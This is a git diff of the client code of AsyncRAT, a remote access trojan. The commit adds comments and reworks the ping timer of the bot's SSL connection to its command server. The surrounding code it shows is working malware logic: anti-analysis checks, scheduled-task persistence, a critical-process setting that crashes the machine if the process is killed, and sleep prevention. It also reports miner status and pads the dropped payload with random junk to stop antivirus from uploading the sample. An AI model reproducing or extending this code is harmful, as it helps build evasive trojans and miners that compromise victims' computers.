diff --git a/AsyncRAT-C#/Client/Connection/ClientSocket.cs b/AsyncRAT-C#/Client/Connection/ClientSocket.cs index 560549e..0b8af18 100644 --- a/AsyncRAT-C#/Client/Connection/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Connection/ClientSocket.cs @@ -22,17 +22,19 @@ namespace Client.Connection { public static class ClientSocket { - public static Socket TcpClient { get; set; } - public static SslStream SslClient { get; set; } - private static byte[] Buffer { get; set; } - private static long Buffersize { get; set; } - private static Timer Tick { get; set; } - private static MemoryStream MS { get; set; } - public static bool IsConnected { get; set; } - private static object SendSync { get; } = new object(); - public static Stopwatch Pong { get; set; } + public static Socket TcpClient { get; set; } //Main socket + public static SslStream SslClient { get; set; } //Main SSLstream + private static byte[] Buffer { get; set; } //Socket buffer + private static long Buffersize { get; set; } //Recevied size + private static Timer KeepAlive { get; set; } //Send Performance + private static MemoryStream MS { get; set; } //Socket MS + public static bool IsConnected { get; set; } //Check socket status + private static object SendSync { get; } = new object(); //Sync send + private static Timer Ping { get; set; } //Send ping interval + public static int Interval { get; set; } //ping value - public static void InitializeClient() + + public static void InitializeClient() //Connect & reconnect { try { @@ -90,8 +92,7 @@ namespace Client.Connection Buffer = new byte[4]; MS = new MemoryStream(); Send(IdSender.SendInfo()); - Tick = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000)); - Pong = new Stopwatch(); + KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000)); SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); } else @@ -126,7 +127,7 @@ namespace Client.Connection try { - Tick?.Dispose(); + KeepAlive?.Dispose(); SslClient?.Dispose(); TcpClient?.Dispose(); MS?.Dispose(); @@ -134,7 +135,7 @@ namespace Client.Connection catch { } } - public static void ReadServertData(IAsyncResult ar) + public static void ReadServertData(IAsyncResult ar) //Socket read/recevie { try { @@ -243,9 +244,15 @@ namespace Client.Connection msgpack.ForcePathObject("Packet").AsString = "Ping"; msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)IdSender.TheCPUCounter.NextValue()}% RAM {(int)IdSender.TheMemCounter.NextValue()}%"; Send(msgpack.Encode2Bytes()); - Pong.Reset(); - Pong.Start(); + Ping?.Dispose(); + Interval = 0; + Ping = new Timer(new TimerCallback(Pong), null, 1, 1); GC.Collect(); } + + private static void Pong(object obj) + { + Interval++; + } } } diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index ae91776..18a8aad 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -4,12 +4,8 @@ using Client.MessagePack; using Client.Connection; using System; using System.Diagnostics; -using System.IO; -using System.Net.Sockets; using System.Reflection; -using System.Text; using System.Threading; -using System.Windows.Forms; using System.Collections.Generic; using Microsoft.VisualBasic; @@ -25,12 +21,12 @@ namespace Client.Handle_Packet unpack_msgpack.DecodeFromBytes((byte[])data); switch (unpack_msgpack.ForcePathObject("Packet").AsString) { - case "pong": + case "pong": //send interval value to server { - ClientSocket.Pong.Stop(); + int interval = (int)ClientSocket.Interval; MsgPack msgPack = new MsgPack(); msgPack.ForcePathObject("Packet").SetAsString("pong"); - msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Pong.ElapsedMilliseconds); + msgPack.ForcePathObject("Message").SetAsInteger(interval); ClientSocket.Send(msgPack.Encode2Bytes()); break; } @@ -80,7 +76,7 @@ namespace Client.Handle_Packet } } - private static void Received() + private static void Received() //reset client forecolor { MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "Received"; @@ -88,7 +84,7 @@ namespace Client.Handle_Packet Thread.Sleep(1000); } - public static void Error(string ex) + public static void Error(string ex) //send to logs { MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "Error"; diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index 47e6676..ec037b9 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -16,7 +16,7 @@ namespace Client.Install try { FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile)); - if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName) + if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName) //check if payload is running from installation path { for (int i = 0; i < 10; i++) @@ -24,7 +24,7 @@ namespace Client.Install Thread.Sleep(1000); } - foreach (Process P in Process.GetProcesses()) + foreach (Process P in Process.GetProcesses()) //kill any process which shares same path { try { @@ -33,7 +33,7 @@ namespace Client.Install } catch { } } - if (Methods.IsAdmin()) + if (Methods.IsAdmin()) //if payload is runnign as administrator install schtasks { Process proc = new Process { @@ -64,6 +64,8 @@ namespace Client.Install fs = new FileStream(installPath.FullName, FileMode.CreateNew); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); fs.Write(clientExe, 0, clientExe.Length); + + //prevent AV from sending sample by increasing the payload size byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)]; new Random().NextBytes(junk); fs.Write(junk, 0, junk.Length); diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index d2d6e5f..b7ed309 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs @@ -23,25 +23,25 @@ namespace Client try { - if (!MutexControl.CreateMutex()) + if (!MutexControl.CreateMutex()) //if current payload is a duplicate Environment.Exit(0); - if (Convert.ToBoolean(Settings.Anti)) + if (Convert.ToBoolean(Settings.Anti)) //run anti-virtual environment Anti_Analysis.RunAntiAnalysis(); - if (Convert.ToBoolean(Settings.Install)) + if (Convert.ToBoolean(Settings.Install)) //drop payload [persistence] NormalStartup.Install(); - if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin()) + if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin()) //active critical process ProcessCritical.Set(); - Methods.PreventSleep(); + Methods.PreventSleep(); //prevent pc to idle\sleep - new CheckMiner().GetProcess(); + new CheckMiner().GetProcess(); //check miner status } catch { } - while (true) + while (true) // ~ loop to check socket status { if (!ClientSocket.IsConnected) {